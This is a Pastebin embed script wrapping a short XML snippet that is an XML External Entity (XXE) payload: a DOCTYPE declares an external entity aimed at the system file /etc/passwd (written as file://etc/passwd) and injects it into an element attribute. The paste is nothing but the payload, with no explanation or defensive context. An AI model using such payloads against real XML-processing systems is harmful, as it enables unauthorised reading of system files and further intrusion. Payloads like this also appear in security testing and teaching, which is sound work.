document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE root [
  3. <!ENTITY xxe SYSTEM "file://etc/passwd">
  4. ]>
  5. <elemento atributo="&xxe;"/>
');